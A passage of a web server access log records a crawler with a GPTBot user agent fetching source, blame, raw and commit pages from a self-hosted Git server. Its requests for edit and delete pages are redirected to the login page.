+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:05:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:05:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 888] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 14090] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15814] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:17:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14898] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:17:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11981] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" -[17/Feb/2026:17:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12832] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:17:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog?display=rendered" [Client 74.7.227.38] [Length 84467] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:17:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12816] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:17:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog?display=rendered" [Client 74.7.227.38] [Length 84431] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" -[17/Feb/2026:17:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12311] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" -[17/Feb/2026:17:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:05:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:05:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:05:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 16209] [Gzip 7.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14845] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14491] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:17:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 15109] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:17:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 14159] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:17:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 20553] [Gzip 6.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11098] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:05:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:05:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11580] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11585] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:05:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:05:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:05:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 